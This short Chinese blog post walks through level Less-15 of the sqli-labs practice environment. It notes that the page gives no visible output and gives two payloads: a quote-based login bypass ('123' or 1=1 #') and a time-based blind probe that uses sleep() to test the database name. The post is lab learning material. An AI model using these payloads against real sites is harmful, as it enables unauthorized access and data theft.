Less-15【盲注+时间注入】

    利用单引号双引号进行测试 发现网页无回显,所以注入方式为盲注,并且测试结果需要用时间注入来验证
用万能语句进行测试,双引号无反应,单引号测试成功
123' or 1=1 #
利用时间注入测试
后续测试结果与之前相同
123'or if((database()='security'),sleep(0.3),sleep(0.1))#
 
posted @ 2020-10-30 09:55  峰中追风  阅读(141)  评论(0编辑  收藏  举报

___________________________________________________________________________________________没有白跑的路